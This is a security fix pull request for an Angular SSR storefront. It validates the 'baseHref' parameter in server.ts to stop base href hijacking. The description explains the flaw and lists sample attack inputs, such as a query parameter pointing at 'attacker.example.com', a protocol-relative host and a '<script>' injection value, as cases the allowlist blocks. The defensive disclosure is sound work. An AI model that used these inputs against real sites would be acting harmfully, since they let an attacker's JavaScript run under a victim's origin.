### PR TITLE
fix: validate `baseHref` parameter to prevent base href hijacking

### DIFF
--- a/server.ts
+++ b/server.ts
@@ -515,7 +515,7 @@ export function app() {
       baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
     }
     // only allow safe path characters to prevent base href hijacking / HTML injection
-    if (!/^\/[a-zA-Z0-9\-._~!$&'()*+,;=:@/]*$/.test(baseHref) && baseHref !== '/') {
+    if (!/^\/[a-zA-Z0-9\-._~!$()*+,;=:@/]*$/.test(baseHref)) {
       baseHref = '/';
     }
 

--- a/server.ts
+++ b/server.ts
@@ -509,13 +509,13 @@ export function app() {
     }
 
     // find last baseHref parameter
-    const regex = /baseHref=([^;?#]*)/g;
+    const regex = /baseHref=([^;?#&]*)/g;
     let baseHref = '/';
     for (let match: RegExpExecArray; (match = regex.exec(req.originalUrl));) {
       baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
     }
-    // reject absolute URLs and protocol-relative paths to prevent base href hijacking
-    if (!/^\/([^/]|$)/.test(baseHref)) {
+    // only allow safe path characters to prevent base href hijacking / HTML injection
+    if (!/^\/[a-zA-Z0-9\-._~!$&'()*+,;=:@/]*$/.test(baseHref) && baseHref !== '/') {
       baseHref = '/';
     }
 

--- a/server.ts
+++ b/server.ts
@@ -514,6 +514,10 @@ export function app() {
     for (let match: RegExpExecArray; (match = regex.exec(req.originalUrl));) {
       baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
     }
+    // reject absolute URLs and protocol-relative paths to prevent base href hijacking
+    if (!/^\/([^/]|$)/.test(baseHref)) {
+      baseHref = '/';
+    }
 
     commonEngine
       .render({

--- a/server.ts
+++ b/server.ts
@@ -514,8 +514,8 @@ export function app() {
     for (let match: RegExpExecArray; (match = regex.exec(req.originalUrl));) {
       baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
     }
-    // only allow safe path characters to prevent base href hijacking / HTML injection
-    if (!/^\/[a-zA-Z0-9\-._~!$()*+,;=:@/]*$/.test(baseHref)) {
+    // only allow simple path segments to prevent base href hijacking
+    if (!/^\/([a-zA-Z0-9][a-zA-Z0-9\-._/]*)?$/.test(baseHref)) {
       baseHref = '/';
     }
 

--- a/server.ts
+++ b/server.ts
@@ -508,10 +508,11 @@ export function app() {
       }
     }
 
-    // find last baseHref parameter
-    const regex = /baseHref=([^;?#&]*)/g;
+    // extract last baseHref from matrix params only (;baseHref=...), ignore query string
+    const pathPart = req.originalUrl.split('?')[0];
+    const baseHrefRegex = /;baseHref=([^;]*)/g;
     let baseHref = '/';
-    for (let match: RegExpExecArray; (match = regex.exec(req.originalUrl));) {
+    for (let match: RegExpExecArray; (match = baseHrefRegex.exec(pathPart));) {
       baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
     }
     // only allow simple path segments to prevent base href hijacking


### PR DESCRIPTION
### 🚀 Description

**What is the vulnerability**

The PWA uses Angular with server-side rendering (SSR). The express.js SSR server reads the `?baseHref=` query parameter and injects it into the rendered HTML **without any validation**:

```typescript
// server.ts — relevant excerpt
const regex = /baseHref=([^;?#]*)/g;
let baseHref = '/';
for (let match; (match = regex.exec(req.originalUrl));) {
  baseHref = match[1].replace(/%25/g, '%').replace(/%2F/g, '/');
}
// ...
newHtml = newHtml.replace(/<base href="[^>]*>/, `<base href="${baseHref}" />`);
```

If an attacker passes `?baseHref=https://attacker.example.com/`, the SSR renders:

```html
<base href="https://attacker.example.com/" />
```

The `<base href>` tag tells the browser where to resolve all relative paths. Every JS bundle, CSS file, and asset reference in the page becomes:

```
runtime.869b026b8a1a07f5.js  →  https://attacker.example.com/runtime.869b026b8a1a07f5.js
main.6a929f4afb5be26a.js     →  https://attacker.example.com/main.6a929f4afb5be26a.js
vendor.4c770a5c44762a04.js   →  https://attacker.example.com/vendor.4c770a5c44762a04.js
```

The attacker's server responds with malicious JS for every request. That JS executes on the original PWA domain — the address bar shows the real domain throughout.

---

### 🔍 Detailed Changes

The SSR server extracted the `baseHref` parameter from the request URL without validation and injected it directly into the rendered HTML `<base href="...">` tag. An attacker could pass an absolute URL (e.g. `?baseHref=https://attacker.com/`), causing all relative script/CSS/asset references to resolve against the attacker's domain — enabling full JavaScript execution under the victim's origin.

**Changes:**

- Restrict extraction to matrix parameters only (`;baseHref=...`), ignoring query string values that nginx never sets
- Take the last match, which is always the one appended by nginx in multi-channel setups
- Validate the decoded value against an allowlist (`/^\/([a-zA-Z0-9][a-zA-Z0-9\-._/]*)?$/`), rejecting absolute URLs, protocol-relative paths, and special characters
- Reset to `/` if validation fails

**Attack vectors blocked:**

- `?baseHref=https://attacker.com/` — query string ignored entirely
- `;baseHref=https://attacker.com` — fails allowlist (no leading `/`)
- `;baseHref=%2F%2Fattacker.com` — decodes to `//attacker.com`, fails allowlist (second char is `/`)
- `;baseHref=%2F<script>` — fails allowlist (`<` not permitted)

**Existing behavior preserved:**

- Legitimate nginx multi-channel values like `;baseHref=%2Fb2c` decode to `/b2c` and pass validation
- Deployments without multi-channel (no `;baseHref=` in URL) default to `/` as before

---

### 📝 Notes

To apply the changes just copy or cherry-pick the changes in to your projects `server.ts`.
This section is pretty much unchanged (besides some linting/formatting) since PWA 1.0.0 and the fixed section should work in all PWA versions with the more restrictive `baseHref` extraction.

---

Quick temporary fix for current PWA deployments WITHOUT multi channel configuration that would not require source code changes:

```yaml
    cache:
      additionalHeaders: |
        headers:
          - Content-Security-Policy: "base-uri 'self'"
```
---

### 🔗 Other Information

[AB#119936](https://dev.azure.com/intershop-com/cefd1005-00a7-4c79-927f-a16947d1b2e6/_workitems/edit/119936)